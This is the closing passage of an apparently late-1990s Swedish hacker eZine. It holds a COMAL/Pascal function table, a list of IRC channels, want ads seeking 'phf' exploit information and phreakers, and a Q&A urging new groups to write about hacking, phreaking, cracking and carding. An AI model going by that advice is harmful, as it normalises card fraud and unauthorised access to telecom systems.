OR (eller) | (2*3 =5) OR (2*3=6) | Sant
|
|
|
|
NOT (inte) | NOT (3*333 < 1000) | Falskt
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
Standardfunktioner
|
|
|
|
________________________________________________________________________
|
|
|
|
Funktion | COMAL (BASIC) | Pascal | Kommentar
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
sin x | SIN(X) | SIN(X) | X anges i radianer
|
|
|
|
cos x | COS(X) | COS(X) | X anges i radianer
|
|
|
|
tan x | TAN(X) | (saknas) | X anges i radianer
|
|
|
|
arctan x | ATN(X) | ARCTAN(X) | ger vinkeln i radianer
|
|
|
|
e^x | EXP(X) | EXP(X) |
|
|
|
|
ln | LOG(X) | LN(X) | X > 0
|
|
|
|
roten ur X | SQR(X) | SQRT(X) | OBS! Pascalbeteckningen
|
|
|
|
X^2 | (X*X, X ^ 2) | SQR(X) | kvadrera heltal (INTEGER)
|
|
|
|
ent x | INT(X) | INT(X) | heltalsdelen av X (REAL)
|
|
|
|
| | TRUNC(X) | heltalsdelen av X (INTEGER)
|
|
|
|
|x| | ABS(X) | ABS(X) | absolutbeloppet av X
|
|
|
|
| RND | RANDOM | slumptalsalstrare
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[15] Ett par IRCnet kanaler knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Här kommer en liten lista med bra kanaler på IRCnet (?)
|
|
|
|
|
|
|
|
Server
|
|
|
|
irc.swipnet.se
|
|
|
|
|
|
|
|
Kanaler
|
|
|
|
#blackmetal.se
|
|
|
|
#vsp
|
|
|
|
#eject
|
|
|
|
#flug
|
|
|
|
#Linux
|
|
|
|
#Linux.se
|
|
|
|
#security
|
|
|
|
#Pyttemjuk
|
|
|
|
#ulug
|
|
|
|
#unix
|
|
|
|
#unix.se
|
|
|
|
#hacking
|
|
|
|
#phonesex
|
|
|
|
#fist
|
|
|
|
#hacknews
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[16] Köpes, Säljes och Sökes ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
|
|
|
|
Köpes:
|
|
|
|
|
|
|
|
1. Flashback tidningar köpes
|
|
|
|
pris dikuteras
|
|
|
|
nilssonmarcus@hotmail.com
|
|
|
|
|
|
|
|
2. Bärbar dator, fett med billig.
|
|
|
|
knash@linux.nu
|
|
|
|
|
|
|
|
Sökes
|
|
|
|
|
|
|
|
1. Information phf
|
|
|
|
knash@linux.nu
|
|
|
|
|
|
|
|
2. Danska, Norska och Finska Phreakers sökes.
|
|
|
|
maila knash@linux.nu
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[17] Frågor och kanske svar ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Jag har starten en lite myshörna med frågor och svar, om d u har några
|
|
|
|
frågor eller vill svara på en fråga som står här så skickar du ett mail
|
|
|
|
till knash@linux.nu.
|
|
|
|
|
|
|
|
Hur blir man en framgångsrik grupp ? | Anonym
|
|
|
|
|
|
|
|
Svar: Börja med att fixa ett snyggt namn på gruppen och en hemsida med
|
|
|
|
mycket snygg design och även ett eZine är mycket uppskattat och
|
|
|
|
även det med ett mycket kewlt namn och snygg ascii design. Tänk
|
|
|
|
på när du, ni konstruerar zinet att ni har mera tekniskt informa-
|
|
|
|
tion en hummor och ironi. Typ 80% tekniskt 20% bullshit. Börja
|
|
|
|
skriva textfiler också om Hacking, Phreaking, Cracking, Carding
|
|
|
|
etc. Ett tips är att rippa telias manualer och skriva om dom med
|
|
|
|
egna ord, tänk dig en "AXE Växlar från Grunden" eller kanske tom.
|
|
|
|
"Avancerat information blad om AXE växlar" annars är det ju bara
|
|
|
|
att översätta Engelska "högklass" textfiler till svenska, t.ex.
|
|
|
|
Rainbow Books. Lycka till med allt.
|
|
|
|
|
|
|
|
//knash
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[18] Copyright ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Jopp visst är det en lam Copyleft på detta eZine för att folk inte så
|
|
|
|
ändra en massa grejer i zinet, men seriöst "Who cares?" Om du lägger upp
|
|
|
|
zinet på din hemsid, underground cd eller någonstanns där du publicerar
|
|
|
|
den skicka genast ett mail till mig (knash@linux.nu) och tala om det.
|
|
|
|
Jag kommer att göra reklam för din hemsida i zinet då =)
|
|
|
|
|
|
|
|
Copyright (c) Heretics Inc. All right Servered
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[19] Prenumeration ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Starta prenumeration
|
|
|
|
|
|
|
|
Skicka ett email till knash@linux.nu med subscribe OI i Subjekt rutan.
|
|
|
|
|
|
|
|
Avlsuta prenumeration
|
|
|
|
Skicka ett email till knash@linux.nu med unsubscribe OI i Subjekt ruta-
|
|
|
|
n.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦ ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
|
|
|
|
O U T L A W I N F O R M A T I V A
|
|
|
|
F R O M H E R E T I C S I N C .
|
|
|
|
W W W . H E R E T I C S . C J B . N E T
|
|
|
|
K N A S H @ L I N U X . N U
|
|
|